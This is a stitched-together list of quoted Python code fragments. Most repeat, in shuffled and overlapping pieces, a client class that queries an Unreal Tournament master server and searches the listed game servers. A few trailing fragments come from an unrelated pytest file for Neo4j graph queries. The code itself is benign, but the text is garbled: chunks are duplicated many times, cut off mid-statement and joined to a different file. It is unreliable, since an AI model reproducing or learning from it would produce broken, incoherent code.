"to a list of Server objects. Returns: None \"\"\" # The Quake style",
"item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.'",
"status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor: executor.map(get_server_info,",
"self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in",
"(self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a client list",
"search_servers(self, query): \"\"\" Search for a given query in any of the values",
"= hostname self.port = port self.servers = [] if 'logger' not in kwargs:",
"# or server clients), need a header of 4 \\xFF bytes command =",
"self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if re.search( query,",
"fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)}",
"Resolvable DNS name or IP address for the Master Server you'd wish to",
"a list of Server objects. Returns: None \"\"\" # The Quake style queries",
"for a given query in any of the values in the server dict",
"\\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results =",
"self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def",
"and sets the class attribute of 'servers' to a list of Server objects.",
"objects. Returns: None \"\"\" # The Quake style queries to end clients (whether",
"re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self):",
"kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs:",
"keys. Args: query (str): the search query to look for in the dictionary",
"keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if re.search(",
"style queries to end clients (whether they be Master Servers # or server",
"of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)}",
"logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5",
"(str): Resolvable DNS name or IP address for the Master Server you'd wish",
"client list and sets the class attribute of 'servers' to a list of",
"Returns: A list of Servers \"\"\" if not self.servers: return return_list = []",
"None \"\"\" # The Quake style queries to end clients (whether they be",
"for a client list and sets the class attribute of 'servers' to a",
"in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock",
"captured from the Master Server and capture info and status headers. Returns: None",
"socket import re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer",
"you'd wish to poll. port (int): The port number the master server is",
"msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:]",
"self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val",
"self.port = port self.servers = [] if 'logger' not in kwargs: self.logger =",
"def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server and",
"Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self,",
"= '' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break",
"servers captured from the Master Server and capture info and status headers. Returns:",
"servers running.' ) def search_servers(self, query): \"\"\" Search for a given query in",
"look for in the dictionary keys Returns: A list of Servers \"\"\" if",
"from .unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler())",
"and capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with",
"return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server",
"[ key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE )",
"any of the values in the server dict keys. Args: query (str): the",
"UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query):",
"= self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as",
"def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args:",
"Servers # or server clients), need a header of 4 \\xFF bytes command",
"the server dict keys. Args: query (str): the search query to look for",
"if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise",
"] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers",
"server dict keys. Args: query (str): the search query to look for in",
"the class attribute of 'servers' to a list of Server objects. Returns: None",
"of Server objects. Returns: None \"\"\" # The Quake style queries to end",
"self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg) <=",
"of the values in the server dict keys. Args: query (str): the search",
"\"\"\" self.hostname = hostname self.port = port self.servers = [] if 'logger' not",
"= kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname,",
"number the master server is listening on \"\"\" self.hostname = hostname self.port =",
"fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data",
"self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET,",
"clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending",
") ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all",
"while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8')",
"key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results:",
"to end clients (whether they be Master Servers # or server clients), need",
"= [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in",
"UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or IP address",
"Server objects. Returns: None \"\"\" # The Quake style queries to end clients",
"in any of the values in the server dict keys. Args: query (str):",
"'' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg",
"to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg",
"kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port)",
"= socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the",
"the dictionary keys Returns: A list of Servers \"\"\" if not self.servers: return",
"return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the",
"Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname,",
"address for the Master Server you'd wish to poll. port (int): The port",
"str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently",
"= port self.servers = [] if 'logger' not in kwargs: self.logger = logger",
"else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server",
"for the Master Server you'd wish to poll. port (int): The port number",
"self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server =",
"import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object):",
"the Master Server and capture info and status headers. Returns: None \"\"\" def",
"self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a",
"class init statement Args: hostname (str): Resolvable DNS name or IP address for",
"in the server dict keys. Args: query (str): the search query to look",
"self.hostname = hostname self.port = port self.servers = [] if 'logger' not in",
"Returns: None \"\"\" # The Quake style queries to end clients (whether they",
"dictionary keys Returns: A list of Servers \"\"\" if not self.servers: return return_list",
"class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init",
"f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try:",
"return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for",
"for in the dictionary keys Returns: A list of Servers \"\"\" if not",
"(str): the search query to look for in the dictionary keys Returns: A",
"self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning",
"command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server)",
"self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self,",
"keys Returns: A list of Servers \"\"\" if not self.servers: return return_list =",
"is listening on \"\"\" self.hostname = hostname self.port = port self.servers = []",
"= kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout =",
"search query to look for in the dictionary keys Returns: A list of",
"Poll the Master Server for a client list and sets the class attribute",
"e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]:",
"they be Master Servers # or server clients), need a header of 4",
") self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096)",
"init statement Args: hostname (str): Resolvable DNS name or IP address for the",
"kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock =",
"as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in",
"if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed",
"key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ]",
"concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup Logger import",
"\"\"\" Concurrently poll all servers captured from the Master Server and capture info",
"clients (whether they be Master Servers # or server clients), need a header",
"= fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found",
"return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master",
"len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e",
"info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as",
"sets the class attribute of 'servers' to a list of Server objects. Returns:",
"class attribute of 'servers' to a list of Server objects. Returns: None \"\"\"",
"The port number the master server is listening on \"\"\" self.hostname = hostname",
"pprint import pformat from .unrealserver import UnrealServer # Setup Logger import logging logger",
"{self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg =",
"IP address for the Master Server you'd wish to poll. port (int): The",
"list of Server objects. Returns: None \"\"\" # The Quake style queries to",
"not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not",
"\"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for",
"socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item",
"UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def",
"= logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\"",
"info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from",
"list and sets the class attribute of 'servers' to a list of Server",
"kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self):",
"name or IP address for the Master Server you'd wish to poll. port",
"the Master Server for a client list and sets the class attribute of",
"self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout",
"re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll",
"<= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw",
"A list of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info(",
"Master Servers # or server clients), need a header of 4 \\xFF bytes",
"the Master Server you'd wish to poll. port (int): The port number the",
"if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def",
"5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout)",
"{server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items()",
"or IP address for the Master Server you'd wish to poll. port (int):",
"Quake style queries to end clients (whether they be Master Servers # or",
"the search query to look for in the dictionary keys Returns: A list",
"Server you'd wish to poll. port (int): The port number the master server",
"dict keys. Args: query (str): the search query to look for in the",
"The Quake style queries to end clients (whether they be Master Servers #",
"socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server",
"not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.'",
"Concurrently poll all servers captured from the Master Server and capture info and",
"+= msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data =",
"0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data",
"= [] if 'logger' not in kwargs: self.logger = logger else: self.logger =",
"msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout",
"self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for",
"received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) )",
"'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout'",
"int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\"",
".unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class",
"socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master",
"= b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg",
"DNS name or IP address for the Master Server you'd wish to poll.",
"raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append(",
"capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor()",
"self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' )",
"the values in the server dict keys. Args: query (str): the search query",
"'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs:",
"Args: hostname (str): Resolvable DNS name or IP address for the Master Server",
"\"\"\" # The Quake style queries to end clients (whether they be Master",
"from the Master Server and capture info and status headers. Returns: None \"\"\"",
"logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer",
"break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}')",
"server clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug(",
"f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a given",
"hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable",
"query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\"",
"in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in",
"import re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer #",
"4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' )",
"query (str): the search query to look for in the dictionary keys Returns:",
"pformat from .unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__)",
"bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command,",
"server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for",
"import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port,",
"return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server",
"= [ key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE",
"Server and capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server()",
"{len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for",
"get_servers(self): \"\"\" Poll the Master Server for a client list and sets the",
"for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key",
"data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info(",
"self.port) def get_servers(self): \"\"\" Poll the Master Server for a client list and",
"in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key,",
"__init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname",
"a client list and sets the class attribute of 'servers' to a list",
"of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}'",
"self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if",
"\"\"\" Search for a given query in any of the values in the",
"query in any of the values in the server dict keys. Args: query",
"be Master Servers # or server clients), need a header of 4 \\xFF",
") def search_servers(self, query): \"\"\" Search for a given query in any of",
"**kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name",
"command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while",
"self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a",
"list of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching",
"Args: query (str): the search query to look for in the dictionary keys",
"= (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a client",
"in the dictionary keys Returns: A list of Servers \"\"\" if not self.servers:",
"port (int): The port number the master server is listening on \"\"\" self.hostname",
"fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0:",
"header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to",
"Master Server you'd wish to poll. port (int): The port number the master",
"self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e:",
"re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup",
"need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command",
"self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout",
"of 'servers' to a list of Server objects. Returns: None \"\"\" # The",
"master server is listening on \"\"\" self.hostname = hostname self.port = port self.servers",
"# The Quake style queries to end clients (whether they be Master Servers",
"self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = ''",
"Master Server and capture info and status headers. Returns: None \"\"\" def get_server_info(server):",
"# Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__(",
"query to look for in the dictionary keys Returns: A list of Servers",
"(whether they be Master Servers # or server clients), need a header of",
"to poll. port (int): The port number the master server is listening on",
"e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0],",
"= 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)",
"logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs,",
"): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or",
"def get_servers(self): \"\"\" Poll the Master Server for a client list and sets",
"Master Server for a client list and sets the class attribute of 'servers'",
"data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger)",
"val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server)",
") self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for",
"given query in any of the values in the server dict keys. Args:",
"attribute of 'servers' to a list of Server objects. Returns: None \"\"\" #",
"a given query in any of the values in the server dict keys.",
"True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except",
"and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor:",
"listening on \"\"\" self.hostname = hostname self.port = port self.servers = [] if",
"logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ):",
"{len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a given query",
"[] if 'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger']",
"import socket import re import concurrent.futures from pprint import pformat from .unrealserver import",
"headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor: executor.map(get_server_info, self.servers)",
"= logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout =",
"or server clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\"",
"end clients (whether they be Master Servers # or server clients), need a",
"info_results = [ key for key, val in server.info.items() if re.search( query, str(val),",
"Server for a client list and sets the class attribute of 'servers' to",
"self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll",
"\\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True:",
"port number the master server is listening on \"\"\" self.hostname = hostname self.port",
"in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' )",
"poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server and capture",
"servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\")",
"on \"\"\" self.hostname = hostname self.port = port self.servers = [] if 'logger'",
"b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg =",
"port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS",
"keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results",
"Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers",
"for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if",
"if 'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if",
"poll all servers captured from the Master Server and capture info and status"
"\"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids,",
"= os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges():",
"= os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options =",
"yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\":",
"Neo4j.\"\"\" # pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible",
"os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test",
"[ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope',",
"do pytest fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties,",
"'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\"",
"edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options =",
"the incredible way we do pytest fixtures import json import os import pytest",
"import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL =",
"fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL",
"== edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = {",
"= { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids",
"= { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id",
"because of the incredible way we do pytest fixtures import json import os",
"stuff happens because of the incredible way we do pytest fixtures import json",
"NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError):",
"1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\"",
"edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id']",
"\"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": {",
"**options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking",
"'18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id",
"{ \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id =",
"= [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737',",
"def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL,",
"= os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from",
"\"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges =",
"incredible way we do pytest fixtures import json import os import pytest from",
"'18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ]",
"NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def",
"\"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484'",
"assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options",
"}, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids",
